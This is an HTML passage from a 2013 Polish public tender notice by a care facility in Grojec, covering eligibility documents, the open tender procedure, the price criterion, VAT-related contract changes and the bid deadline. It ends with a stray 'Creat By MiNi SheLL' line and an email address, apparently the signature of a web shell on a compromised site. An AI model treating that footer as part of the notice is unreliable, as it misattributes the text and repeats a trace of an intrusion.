<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT, zmian cen urzędowych wprowadzonych przez odpowiednie organa w ramach przedmiotu zamówienia, zmiana stawki VAT następuje z dniem wejścia w życie stosownego aktu prawnego zmieniającego stawkę VAT na podstawie aneksu. W takim przypadku cena netto pozostaje bez zmian. Zmiana nastąpi po podpisaniu aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu Al. Ogrodowa 1, 32-615 Grojec -sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2013 godzina 12:00, miejsce: Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu Al. Ogrodowa 1, 32-615 Grojec -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com